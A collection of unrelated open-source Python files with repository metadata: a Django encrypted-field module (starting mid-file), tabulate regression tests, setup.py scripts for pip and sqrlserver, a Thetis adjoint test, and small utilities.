a) set ENFORCE_MAX_LENGTH = True in your settings files
b) set 'enforce_max_length' to True in the kwargs of your model.
A ValueError will be raised if the encrypted length of the data (including
prefix if specified) is greater than the max_length of the field.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the EncryptedFieldMixin with the following
optional settings:
* keyname: The name of the keyczar key
* crypter_klass: A custom class that is extended from Keyczar.
* prefix: A static string prepended to all encrypted data
* decrypt_only: Boolean whether to only attempt to decrypt data coming
from the database and not attempt to encrypt the data
being written to the database.
"""
# Allow for custom class extensions of Keyczar.
self._crypter_klass = kwargs.pop('crypter_klass', KeyczarWrapper)
self.keyname = kwargs.pop('keyname', None)
# If settings.DEFAULT_KEY_DIRECTORY, then the key
# is located in DEFAULT_KEY_DIRECTORY/keyname
if self.keyname:
if hasattr(settings, 'DEFAULT_KEY_DIRECTORY'):
self.keydir = os.path.join(
settings.DEFAULT_KEY_DIRECTORY,
self.keyname
)
else:
raise ImproperlyConfigured(
'You must set settings.DEFAULT_KEY_DIRECTORY'
'when using the keyname kwarg'
)
# If the keyname is not defined on a per-field
# basis, then check for the global data encryption key.
if not self.keyname and hasattr(settings, 'ENCRYPTED_FIELDS_KEYDIR'):
self.keydir = settings.ENCRYPTED_FIELDS_KEYDIR
# If we still do not have a keydir, then raise an exception
if not self.keydir:
raise ImproperlyConfigured(
'You must set settings.ENCRYPTED_FIELDS_KEYDIR '
'or name a key with kwarg `keyname`'
)
# The name of the keyczar key without path for logging purposes.
self.keyname = os.path.dirname(self.keydir)
# Prefix encrypted data with a static string to allow filtering
# of encrypted data vs. non-encrypted data using vanilla MySQL queries.
self.prefix = kwargs.pop('prefix', '')
# Allow for model decryption-only, bypassing encryption of data.
# Useful for models that have a sparse amount of data that is required
# to be encrypted.
self.decrypt_only = kwargs.pop('decrypt_only', False)
self._crypter = self._crypter_klass(self.keydir)
# Ensure the encrypted data does not exceed the max_length
# of the database. Data truncation is a possibility otherwise.
self.enforce_max_length = getattr(settings, 'ENFORCE_MAX_LENGTH', False)
if not self.enforce_max_length:
self.enforce_max_length = kwargs.pop('enforce_max_length', False)
super(EncryptedFieldMixin, self).__init__(*args, **kwargs)
def crypter(self):
return self._crypter
def get_internal_type(self):
return 'TextField'
def to_python(self, value):
if value is None or not isinstance(value, str):
return value
if self.prefix and value.startswith(self.prefix):
value = value[len(self.prefix):]
try:
value = self.crypter().decrypt(value)
# value = value.decode('unicode_escape')
except keyczar.errors.KeyczarError:
pass
except UnicodeEncodeError:
pass
except binascii.Error:
pass
return super(EncryptedFieldMixin, self).to_python(value)
def get_prep_value(self, value):
value = super(EncryptedFieldMixin, self).get_prep_value(value)
if value is None or value == '' or self.decrypt_only:
return value
if isinstance(value, str):
value = value.encode('unicode_escape')
# value = value.encode('ascii')
else:
value = str(value)
return self.prefix + self.crypter().encrypt(value)
def get_db_prep_value(self, value, connection, prepared=False):
if not prepared:
value = self.get_prep_value(value)
if self.enforce_max_length:
if (
value
and hasattr(self, 'max_length')
and self.max_length
and len(value) > self.max_length
):
raise ValueError(
'Field {0} max_length={1} encrypted_len={2}'.format(
self.name,
self.max_length,
len(value),
)
)
return value
class EncryptedCharField(EncryptedFieldMixin, models.CharField):
pass
class EncryptedTextField(EncryptedFieldMixin, models.TextField):
pass
class EncryptedDateTimeField(EncryptedFieldMixin, models.DateTimeField):
pass
class EncryptedIntegerField(EncryptedFieldMixin, models.IntegerField):
@cached_property
def validators(self):
"""
See issue https://github.com/defrex/django-encrypted-fields/issues/7
Need to keep all field validators, but need to change `get_internal_type` on the fly
to prevent fail in django 1.7.
"""
self.get_internal_type = lambda: 'IntegerField'
return models.IntegerField.validators.__get__(self)
class EncryptedDateField(EncryptedFieldMixin, models.DateField):
pass
class EncryptedFloatField(EncryptedFieldMixin, models.FloatField):
pass
class EncryptedEmailField(EncryptedFieldMixin, models.EmailField):
pass
class EncryptedBooleanField(EncryptedFieldMixin, models.BooleanField):
pass
try:
from south.modelsinspector import add_introspection_rules
add_introspection_rules([], ['^encrypted_fields\.fields\.\w+Field'])
except ImportError:
pass
|
gerhc/django-encrypted-fields
|
encrypted_fields/fields.py
|
Python
|
mit
| 9,173
|
#-*- coding:utf8 -*-
def crawl_folder(folder):
import os
os_objects = []
seen = set([folder])
for os_object_name in os.listdir(folder):
full_path = os.path.normpath(os.path.join(folder, os_object_name))
if not full_path in seen:
os_objects.append((full_path, os_object_name,))
seen.add(full_path)
return os_objects
class TCustomCounter:
def __init__(self, name, log_stream, verbosity, interval=10):
self.name = name
self.verbosity = verbosity
self.log_stream = log_stream
self.interval = interval
self.value = 0
def add(self):
from datetime import datetime
self.value += 1
if self.verbosity and self.value % self.interval == 0:
self.log_stream.write("Logger: " + self.name + ", value: " + str(self.value) + ", time: " + str(datetime.now())+ "\n")
self.log_stream.flush()
def log_state(self):
from datetime import datetime
self.log_stream.write("Logger: " + self.name + ", value: " + str(self.value) + ", time: " + str(datetime.now())+ "\n")
self.log_stream.flush()
|
mavlyutovrus/light_search
|
lib/utils.py
|
Python
|
mit
| 1,167
|
import io
from pytest import fixture
class _FakeOutputFile(io.StringIO):
def close(self):
self.contents = self.getvalue()
super().close()
@fixture
def fake_output_file():
return _FakeOutputFile()
type_example_values = {
"none": (None,),
"callable": (lambda: None,),
"bool": (True, False),
"digit_int": (0, 2,),
"float": (0.0, 1.2,),
"bytes": (b"", b"bytes"),
"str": ("", "string"),
"list": ([], [None]),
"tuple": ((), (None,)),
"dict": ({}, {None: None}),
"set": (set(), {None}),
}
basic_types = set([type_name for type_name in type_example_values])
class TypeSets:
int = {"digit_int", "bool"}
# number = int | {"float"}
# digits = {"digit_int", "float"}
# sequence = {"bytes", "str", "list", "tuple"}
# iterable = sequence | {"dict", "set"}
# subscriptable = sequence | {"dict"}
# hashable = basic_types - {"list", "dict", "set"}
for type_name in basic_types:
setattr(TypeSets, type_name, {type_name})
def values_not_from_types(*type_names):
excluded_basic_types = [getattr(TypeSets, name) for name in type_names]
remaining_basic_types = basic_types.difference(*excluded_basic_types)
example_values = []
for basic_type in remaining_basic_types:
example_values.extend(type_example_values[basic_type])
return example_values
@fixture(params=values_not_from_types("int", "none"))
def not_int_or_none(request):
return request.param
@fixture(params=values_not_from_types("str"))
def not_str(request):
return request.param
|
nre/Doxhooks
|
tests/unit_tests/conftest.py
|
Python
|
mit
| 1,575
|
"""A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the version number from __init__.py
from sqrlserver import __version__
# Get the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='sqrlserver',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version=__version__,
description='Support library for processing SQRL requests',
long_description=long_description,
# The project's main homepage.
url='https://github.com/Perlkonig/sqrlserver-python',
# Author details
author='Aaron Dalton',
author_email='aaron@daltons.ca',
# Choose your license
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 4 - Beta',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Security :: Cryptography',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: System :: Systems Administration :: Authentication/Directory',
'Topic :: Utilities',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
# What does your project relate to?
keywords='SQRL authentication crypotgraphy signature verification',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
# Alternatively, if you want to distribute just a my_module.py, uncomment
# this:
# py_modules=["my_module"],
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=[
'bitstring',
'pynacl',
],
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
extras_require={
'dev': ['check-manifest'],
'test': ['coverage'],
},
setup_requires=['pytest-runner'],
tests_require=['pytest'],
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
# package_data={
# 'sample': ['package_data.dat'],
# },
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files # noqa
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
#data_files=[('my_data', ['data/data_file'])],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
# entry_points={
# 'console_scripts': [
# 'sample=sample:main',
# ],
# },
)
|
Perlkonig/sqrlserver-python
|
setup.py
|
Python
|
mit
| 4,350
|
# -*- coding: utf-8 -*-
"""Regression tests."""
from __future__ import print_function
from __future__ import unicode_literals
from tabulate import tabulate, _text_type, _long_type, TableFormat, Line, DataRow
from common import assert_equal, assert_in, skip
def test_ansi_color_in_table_cells():
"Regression: ANSI color in table cells (issue #5)."
colortable = [("test", "\x1b[31mtest\x1b[0m", "\x1b[32mtest\x1b[0m")]
colorlessheaders = ("test", "test", "test")
formatted = tabulate(colortable, colorlessheaders, "pipe")
expected = "\n".join(
[
"| test | test | test |",
"|:-------|:-------|:-------|",
"| test | \x1b[31mtest\x1b[0m | \x1b[32mtest\x1b[0m |",
]
)
print("expected: %r\n\ngot: %r\n" % (expected, formatted))
assert_equal(expected, formatted)
def test_alignment_of_colored_cells():
"Regression: Align ANSI-colored values as if they were colorless."
colortable = [
("test", 42, "\x1b[31m42\x1b[0m"),
("test", 101, "\x1b[32m101\x1b[0m"),
]
colorheaders = ("test", "\x1b[34mtest\x1b[0m", "test")
formatted = tabulate(colortable, colorheaders, "grid")
expected = "\n".join(
[
"+--------+--------+--------+",
"| test | \x1b[34mtest\x1b[0m | test |",
"+========+========+========+",
"| test | 42 | \x1b[31m42\x1b[0m |",
"+--------+--------+--------+",
"| test | 101 | \x1b[32m101\x1b[0m |",
"+--------+--------+--------+",
]
)
print("expected: %r\n\ngot: %r\n" % (expected, formatted))
assert_equal(expected, formatted)
def test_alignment_of_link_cells():
"Regression: Align links as if they were colorless."
linktable = [
("test", 42, "\x1b]8;;target\x1b\\test\x1b]8;;\x1b\\"),
("test", 101, "\x1b]8;;target\x1b\\test\x1b]8;;\x1b\\"),
]
linkheaders = ("test", "\x1b]8;;target\x1b\\test\x1b]8;;\x1b\\", "test")
formatted = tabulate(linktable, linkheaders, "grid")
expected = "\n".join(
[
"+--------+--------+--------+",
"| test | \x1b]8;;target\x1b\\test\x1b]8;;\x1b\\ | test |",
"+========+========+========+",
"| test | 42 | \x1b]8;;target\x1b\\test\x1b]8;;\x1b\\ |",
"+--------+--------+--------+",
"| test | 101 | \x1b]8;;target\x1b\\test\x1b]8;;\x1b\\ |",
"+--------+--------+--------+",
]
)
print("expected: %r\n\ngot: %r\n" % (expected, formatted))
assert_equal(expected, formatted)
def test_alignment_of_link_text_cells():
"Regression: Align links as if they were colorless."
linktable = [
("test", 42, "1\x1b]8;;target\x1b\\test\x1b]8;;\x1b\\2"),
("test", 101, "3\x1b]8;;target\x1b\\test\x1b]8;;\x1b\\4"),
]
linkheaders = ("test", "5\x1b]8;;target\x1b\\test\x1b]8;;\x1b\\6", "test")
formatted = tabulate(linktable, linkheaders, "grid")
expected = "\n".join(
[
"+--------+----------+--------+",
"| test | 5\x1b]8;;target\x1b\\test\x1b]8;;\x1b\\6 | test |",
"+========+==========+========+",
"| test | 42 | 1\x1b]8;;target\x1b\\test\x1b]8;;\x1b\\2 |",
"+--------+----------+--------+",
"| test | 101 | 3\x1b]8;;target\x1b\\test\x1b]8;;\x1b\\4 |",
"+--------+----------+--------+",
]
)
print("expected: %r\n\ngot: %r\n" % (expected, formatted))
assert_equal(expected, formatted)
def test_iter_of_iters_with_headers():
"Regression: Generator of generators with a gen. of headers (issue #9)."
def mk_iter_of_iters():
def mk_iter():
for i in range(3):
yield i
for r in range(3):
yield mk_iter()
def mk_headers():
for h in ["a", "b", "c"]:
yield h
formatted = tabulate(mk_iter_of_iters(), headers=mk_headers())
expected = "\n".join(
[
" a b c",
"--- --- ---",
" 0 1 2",
" 0 1 2",
" 0 1 2",
]
)
print("expected: %r\n\ngot: %r\n" % (expected, formatted))
assert_equal(expected, formatted)
def test_datetime_values():
"Regression: datetime, date, and time values in cells (issue #10)."
import datetime
dt = datetime.datetime(1991, 2, 19, 17, 35, 26)
d = datetime.date(1991, 2, 19)
t = datetime.time(17, 35, 26)
formatted = tabulate([[dt, d, t]])
expected = "\n".join(
[
"------------------- ---------- --------",
"1991-02-19 17:35:26 1991-02-19 17:35:26",
"------------------- ---------- --------",
]
)
print("expected: %r\n\ngot: %r\n" % (expected, formatted))
assert_equal(expected, formatted)
def test_simple_separated_format():
"Regression: simple_separated_format() accepts any separator (issue #12)"
from tabulate import simple_separated_format
fmt = simple_separated_format("!")
expected = "spam!eggs"
formatted = tabulate([["spam", "eggs"]], tablefmt=fmt)
print("expected: %r\n\ngot: %r\n" % (expected, formatted))
assert_equal(expected, formatted)
def py3test_require_py3():
"Regression: py33 tests should actually use Python 3 (issue #13)"
from platform import python_version_tuple
print("Expected Python version: 3.x.x")
print("Python version used for tests: %s.%s.%s" % python_version_tuple())
assert_equal(python_version_tuple()[0], "3")
def test_simple_separated_format_with_headers():
"Regression: simple_separated_format() on tables with headers (issue #15)"
from tabulate import simple_separated_format
expected = " a| b\n 1| 2"
formatted = tabulate(
[[1, 2]], headers=["a", "b"], tablefmt=simple_separated_format("|")
)
assert_equal(expected, formatted)
def test_column_type_of_bytestring_columns():
"Regression: column type for columns of bytestrings (issue #16)"
from tabulate import _column_type, _binary_type
result = _column_type([b"foo", b"bar"])
expected = _binary_type
assert_equal(result, expected)
def test_numeric_column_headers():
"Regression: numbers as column headers (issue #22)"
result = tabulate([[1], [2]], [42])
expected = " 42\n----\n 1\n 2"
assert_equal(result, expected)
lod = [dict((p, i) for p in range(5)) for i in range(5)]
result = tabulate(lod, "keys")
expected = "\n".join(
[
" 0 1 2 3 4",
"--- --- --- --- ---",
" 0 0 0 0 0",
" 1 1 1 1 1",
" 2 2 2 2 2",
" 3 3 3 3 3",
" 4 4 4 4 4",
]
)
assert_equal(result, expected)
def test_88_256_ANSI_color_codes():
"Regression: color codes for terminals with 88/256 colors (issue #26)"
colortable = [("\x1b[48;5;196mred\x1b[49m", "\x1b[38;5;196mred\x1b[39m")]
colorlessheaders = ("background", "foreground")
formatted = tabulate(colortable, colorlessheaders, "pipe")
expected = "\n".join(
[
"| background | foreground |",
"|:-------------|:-------------|",
"| \x1b[48;5;196mred\x1b[49m | \x1b[38;5;196mred\x1b[39m |",
]
)
print("expected: %r\n\ngot: %r\n" % (expected, formatted))
assert_equal(expected, formatted)
def test_column_with_mixed_value_types():
"Regression: mixed value types in the same column (issue #31)"
expected = "\n".join(["-----", "", "a", "я", "0", "False", "-----"])
data = [[None], ["a"], ["\u044f"], [0], [False]]
table = tabulate(data)
assert_equal(table, expected)
def test_latex_escape_special_chars():
"Regression: escape special characters in LaTeX output (issue #32)"
expected = "\n".join(
[
r"\begin{tabular}{l}",
r"\hline",
r" foo\^{}bar \\",
r"\hline",
r" \&\%\^{}\_\$\#\{\}\ensuremath{<}\ensuremath{>}\textasciitilde{} \\",
r"\hline",
r"\end{tabular}",
]
)
result = tabulate([["&%^_$#{}<>~"]], ["foo^bar"], tablefmt="latex")
assert_equal(result, expected)
def test_isconvertible_on_set_values():
"Regression: don't fail with TypeError on set values (issue #35)"
expected_py2 = "\n".join(["a b", "--- -------", "Foo set([])"])
expected_py3 = "\n".join(["a b", "--- -----", "Foo set()"])
result = tabulate([["Foo", set()]], headers=["a", "b"])
assert_in(result, [expected_py2, expected_py3])
def test_ansi_color_for_decimal_numbers():
"Regression: ANSI colors for decimal numbers (issue #36)"
table = [["Magenta", "\033[95m" + "1.1" + "\033[0m"]]
expected = "\n".join(
["------- ---", "Magenta \x1b[95m1.1\x1b[0m", "------- ---"]
)
result = tabulate(table)
assert_equal(result, expected)
def test_alignment_of_decimal_numbers_with_ansi_color():
"Regression: alignment for decimal numbers with ANSI color (issue #42)"
v1 = "\033[95m" + "12.34" + "\033[0m"
v2 = "\033[95m" + "1.23456" + "\033[0m"
table = [[v1], [v2]]
expected = "\n".join(["\x1b[95m12.34\x1b[0m", " \x1b[95m1.23456\x1b[0m"])
result = tabulate(table, tablefmt="plain")
assert_equal(result, expected)
def test_alignment_of_decimal_numbers_with_commas():
"Regression: alignment for decimal numbers with comma separators"
skip("test is temporarily disable until the feature is reimplemented")
# table = [["c1r1", "14502.05"], ["c1r2", 105]]
# result = tabulate(table, tablefmt="grid", floatfmt=',.2f')
# expected = "\n".join(
# ['+------+-----------+', '| c1r1 | 14,502.05 |',
# '+------+-----------+', '| c1r2 | 105.00 |',
# '+------+-----------+']
# )
# assert_equal(result, expected)
def test_long_integers():
"Regression: long integers should be printed as integers (issue #48)"
table = [[18446744073709551614]]
result = tabulate(table, tablefmt="plain")
expected = "18446744073709551614"
assert_equal(result, expected)
def test_colorclass_colors():
"Regression: ANSI colors in a unicode/str subclass (issue #49)"
try:
import colorclass
s = colorclass.Color("{magenta}3.14{/magenta}")
result = tabulate([[s]], tablefmt="plain")
expected = "\x1b[35m3.14\x1b[39m"
assert_equal(result, expected)
except ImportError:
class textclass(_text_type):
pass
s = textclass("\x1b[35m3.14\x1b[39m")
result = tabulate([[s]], tablefmt="plain")
expected = "\x1b[35m3.14\x1b[39m"
assert_equal(result, expected)
def test_mix_normal_and_wide_characters():
"Regression: wide characters in a grid format (issue #51)"
try:
import wcwidth # noqa
ru_text = "\u043f\u0440\u0438\u0432\u0435\u0442"
cn_text = "\u4f60\u597d"
result = tabulate([[ru_text], [cn_text]], tablefmt="grid")
expected = "\n".join(
[
"+--------+",
"| \u043f\u0440\u0438\u0432\u0435\u0442 |",
"+--------+",
"| \u4f60\u597d |",
"+--------+",
]
)
assert_equal(result, expected)
except ImportError:
skip("test_mix_normal_and_wide_characters is skipped (requires wcwidth lib)")
def test_multiline_with_wide_characters():
"Regression: multiline tables with varying number of wide characters (github issue #28)"
try:
import wcwidth # noqa
table = [["가나\n가ab", "가나", "가나"]]
result = tabulate(table, tablefmt="fancy_grid")
expected = "\n".join(
[
"╒══════╤══════╤══════╕",
"│ 가나 │ 가나 │ 가나 │",
"│ 가ab │ │ │",
"╘══════╧══════╧══════╛",
]
)
assert_equal(result, expected)
except ImportError:
skip("test_multiline_with_wide_characters is skipped (requires wcwidth lib)")
def test_align_long_integers():
"Regression: long integers should be aligned as integers (issue #61)"
table = [[_long_type(1)], [_long_type(234)]]
result = tabulate(table, tablefmt="plain")
expected = "\n".join([" 1", "234"])
assert_equal(result, expected)
def test_numpy_array_as_headers():
"Regression: NumPy array used as headers (issue #62)"
try:
import numpy as np
headers = np.array(["foo", "bar"])
result = tabulate([], headers, tablefmt="plain")
expected = "foo bar"
assert_equal(result, expected)
except ImportError:
raise skip("")
def test_boolean_columns():
"Regression: recognize boolean columns (issue #64)"
xortable = [[False, True], [True, False]]
expected = "\n".join(["False True", "True False"])
result = tabulate(xortable, tablefmt="plain")
assert_equal(result, expected)
def test_ansi_color_bold_and_fgcolor():
"Regression: set ANSI color and bold face together (issue #65)"
table = [["1", "2", "3"], ["4", "\x1b[1;31m5\x1b[1;m", "6"], ["7", "8", "9"]]
result = tabulate(table, tablefmt="grid")
expected = "\n".join(
[
"+---+---+---+",
"| 1 | 2 | 3 |",
"+---+---+---+",
"| 4 | \x1b[1;31m5\x1b[1;m | 6 |",
"+---+---+---+",
"| 7 | 8 | 9 |",
"+---+---+---+",
]
)
assert_equal(result, expected)
def test_empty_table_with_keys_as_header():
"Regression: headers='keys' on an empty table (issue #81)"
result = tabulate([], headers="keys")
expected = ""
assert_equal(result, expected)
def test_escape_empty_cell_in_first_column_in_rst():
"Regression: escape empty cells of the first column in RST format (issue #82)"
table = [["foo", 1], ["", 2], ["bar", 3]]
headers = ["", "val"]
expected = "\n".join(
[
"==== =====",
".. val",
"==== =====",
"foo 1",
".. 2",
"bar 3",
"==== =====",
]
)
result = tabulate(table, headers, tablefmt="rst")
assert_equal(result, expected)
def test_ragged_rows():
"Regression: allow rows with different number of columns (issue #85)"
table = [[1, 2, 3], [1, 2], [1, 2, 3, 4]]
expected = "\n".join(["- - - -", "1 2 3", "1 2", "1 2 3 4", "- - - -"])
result = tabulate(table)
assert_equal(result, expected)
def test_empty_pipe_table_with_columns():
"Regression: allow empty pipe tables with columns, like empty dataframes (github issue #15)"
table = []
headers = ["Col1", "Col2"]
expected = "\n".join(["| Col1 | Col2 |", "|--------|--------|"])
result = tabulate(table, headers, tablefmt="pipe")
assert_equal(result, expected)
def test_custom_tablefmt():
"Regression: allow custom TableFormat that specifies with_header_hide (github issue #20)"
tablefmt = TableFormat(
lineabove=Line("", "-", " ", ""),
linebelowheader=Line("", "-", " ", ""),
linebetweenrows=None,
linebelow=Line("", "-", " ", ""),
headerrow=DataRow("", " ", ""),
datarow=DataRow("", " ", ""),
padding=0,
with_header_hide=["lineabove", "linebelow"],
)
rows = [["foo", "bar"], ["baz", "qux"]]
expected = "\n".join(["A B", "--- ---", "foo bar", "baz qux"])
result = tabulate(rows, headers=["A", "B"], tablefmt=tablefmt)
assert_equal(result, expected)
def test_string_with_comma_between_digits_without_floatfmt_grouping_option():
"Regression: accept commas in numbers-as-text when grouping is not defined (github issue #110)"
table = [["126,000"]]
expected = "126,000"
result = tabulate(table, tablefmt="plain")
assert_equal(result, expected) # no exception
|
astanin/python-tabulate
|
test/test_regression.py
|
Python
|
mit
| 16,317
|
import json
with open("birthdays.json", "r") as damnJson:
birthDays = json.load(damnJson)
print("We know the birth days of: ")
for i in birthDays:
print(i)
print("\nWould you like to add or retrieve a birth day?")
lol = input().strip().lower()
if lol == "add":
person = input("Who's the lucky one? ")
date = input("What's his birth day? ")
birthDays[person] = date
with open("birthdays.json", "w") as damnJson:
json.dump(birthDays, damnJson)
print("\nk thx\n")
elif lol == "retrieve":
print("\nWho would you like to know the birth date of? ")
person = input()
print(birthDays[person])
else:
print("fk u m8")
|
daniLOLZ/variaRoba
|
Python/34.py
|
Python
|
mit
| 633
|
"""
Tests whether we can compute a consistent gradient of some functional
based on the forward model with respect to the bottom friction
via firedrake_adjoint.
Stephan Kramer 25-05-16
"""
import pytest
from thetis import *
from firedrake_adjoint import *
op2.init(log_level=INFO)
velocity_u = 2.0
def basic_setup():
lx = 100.0
ly = 50.0
nx = 20
ny = 10
mesh2d = RectangleMesh(nx, ny, lx, ly)
# export interval in seconds
t_export = 0.5
timestep = 0.5
# bathymetry
P1_2d = get_functionspace(mesh2d, 'CG', 1)
bathymetry_2d = Function(P1_2d, name='Bathymetry')
depth = 50.0
bathymetry_2d.assign(depth)
# --- create solver ---
solver_obj = solver2d.FlowSolver2d(mesh2d, bathymetry_2d)
options = solver_obj.options
options.simulation_export_time = t_export
options.check_volume_conservation_2d = True
options.fields_to_export = ['uv_2d', 'elev_2d']
options.timestepper_type = 'CrankNicolson'
options.timestep = timestep
options.horizontal_viscosity = Constant(2.0)
# create function spaces
solver_obj.create_function_spaces()
# create drag function and set it with a bump function representing a turbine
drag_func = Function(solver_obj.function_spaces.P1_2d, name='bottomdrag')
x = SpatialCoordinate(mesh2d)
drag_center = 12.0
drag_bg = 0.0025
x0 = lx/2
y0 = ly/2
sigma = 20.0
drag_func.project(drag_center*exp(-((x[0]-x0)**2 + (x[1]-y0)**2)/sigma**2) + drag_bg)
# assign fiction field
options.quadratic_drag_coefficient = drag_func
# assign boundary conditions
inflow_tag = 1
outflow_tag = 2
inflow_bc = {'un': Constant(-velocity_u)} # NOTE negative into domain
outflow_bc = {'elev': Constant(0.0)}
solver_obj.bnd_functions['shallow_water'] = {inflow_tag: inflow_bc,
outflow_tag: outflow_bc}
return solver_obj
def setup_steady():
solver_obj = basic_setup()
solver_obj.options.timestepper_type = 'SteadyState'
solver_obj.options.simulation_end_time = 0.499
solver_obj.options.timestepper_options.solver_parameters = {
'mat_type': 'aij',
'ksp_type': 'preonly',
'pc_type': 'lu',
'pc_factor_mat_solver_type': 'mumps',
'snes_type': 'newtonls',
}
solver_obj.create_equations()
return solver_obj
def setup_unsteady():
solver_obj = basic_setup()
solver_obj.options.timestepper_type = 'CrankNicolson'
solver_obj.options.simulation_end_time = 2.0
solver_obj.options.timestepper_options.implicitness_theta = 1.0
solver_obj.options.timestepper_options.solver_parameters = {
'mat_type': 'aij',
'ksp_type': 'preonly',
'pc_type': 'lu',
'pc_factor_mat_solver_type': 'mumps',
'snes_type': 'newtonls',
}
solver_obj.create_equations()
return solver_obj
@pytest.fixture(params=[setup_steady, setup_unsteady])
def setup(request):
return request.param
def test_gradient_from_adjoint(setup):
solver_obj = setup()
solver_obj.assign_initial_conditions(uv=as_vector((velocity_u, 0.0)), elev=Constant(0.0))
solver_obj.iterate()
J0 = assemble(solver_obj.fields.solution_2d[0]*dx)
drag_func = Control(solver_obj.options.quadratic_drag_coefficient)
Jhat = ReducedFunctional(J0, drag_func)
c = Function(solver_obj.options.quadratic_drag_coefficient)
dc = Function(c)
from numpy.random import rand
c.vector()[:] = rand(*c.dat.shape)
dc.vector()[:] = rand(*dc.dat.shape)
minconv = taylor_test(Jhat, c, dc)
assert minconv > 1.90
|
tkarna/cofs
|
test_adjoint/test_swe_adjoint.py
|
Python
|
mit
| 3,627
|
import codecs
import os
import re
import sys
from setuptools import setup, find_packages
from setuptools.command.test import test as TestCommand
here = os.path.abspath(os.path.dirname(__file__))
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
#import here, cause outside the eggs aren't loaded
import pytest
sys.exit(pytest.main(self.test_args))
def read(*parts):
# intentionally *not* adding an encoding option to open, See:
# https://github.com/pypa/virtualenv/issues/201#issuecomment-3145690
return codecs.open(os.path.join(here, *parts), 'r').read()
def find_version(*file_paths):
version_file = read(*file_paths)
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]",
version_file, re.M)
if version_match:
return version_match.group(1)
raise RuntimeError("Unable to find version string.")
long_description = read('README.rst')
tests_require = ['pytest', 'virtualenv>=1.10', 'scripttest>=1.3', 'mock']
setup(
name="pip",
version=find_version("pip", "__init__.py"),
description="The PyPA recommended tool for installing Python packages.",
long_description=long_description,
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Topic :: Software Development :: Build Tools",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: Implementation :: PyPy"
],
keywords='easy_install distutils setuptools egg virtualenv',
author='The pip developers',
author_email='python-virtualenv@groups.google.com',
url='http://www.pip-installer.org',
license='MIT',
packages=find_packages(exclude=["contrib", "docs", "tests*", "tasks"]),
package_data={
'pip._vendor.requests': ['*.pem'],
'pip._vendor.distlib._backport': ['sysconfig.cfg'],
'pip._vendor.distlib': ['t32.exe', 't64.exe', 'w32.exe', 'w64.exe'],
},
entry_points={
"console_scripts": [
"pip=pip:main",
"pip%s=pip:main" % sys.version[:1],
"pip%s=pip:main" % sys.version[:3],
],
},
tests_require=tests_require,
zip_safe=False,
extras_require={
'testing': tests_require,
},
cmdclass={'test': PyTest},
)
|
Ivoz/pip
|
setup.py
|
Python
|
mit
| 2,816
|
from .context import CorpusContext
from .audio import AudioContext
from .importable import ImportContext
from .lexical import LexicalContext
from .pause import PauseContext
from .utterance import UtteranceContext
from .structured import StructuredContext
from .syllabic import SyllabicContext
from .spoken import SpokenContext
|
samihuc/PolyglotDB
|
polyglotdb/corpus/__init__.py
|
Python
|
mit
| 328
|
#!/usr/local/bin/python3
# STL imports
import datetime
import json
import logging
import pprint
# Package imports
import dateutil.parser
import sqlalchemy
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import (relationship, scoped_session, sessionmaker,
validates)
import fbd.tools
def default_json_serializer(obj):
'''
JSON serializer for storage objects not supported by the default package
'''
if isinstance(obj, datetime.datetime):
return obj.isoformat()
if (isinstance(obj, Topic) or isinstance(obj, Place) or
isinstance(obj, Event)):
return obj.to_dict()
raise TypeError('{} type could not be serialized.'.format(type(obj)))
Base = declarative_base()
place_topic = sqlalchemy.Table(
'Place_Topic',
Base.metadata,
sqlalchemy.Column('place_id', sqlalchemy.String,
sqlalchemy.ForeignKey('Place.id')),
sqlalchemy.Column('topic_id', sqlalchemy.String,
sqlalchemy.ForeignKey('Topic.id')),
)
class Topic(Base):
__tablename__ = 'Topic'
@classmethod
def from_dict(cls, topic_dict):
return cls(id=topic_dict.get('id'), name=topic_dict.get('name'))
def to_json(self):
return json.dumps(
self.to_dict(),
default=default_json_serializer,
separators=(',', ':'),
)
def to_dict(self):
return {'id': self.id, 'name': self.name}
id = sqlalchemy.Column(sqlalchemy.String(200), primary_key=True)
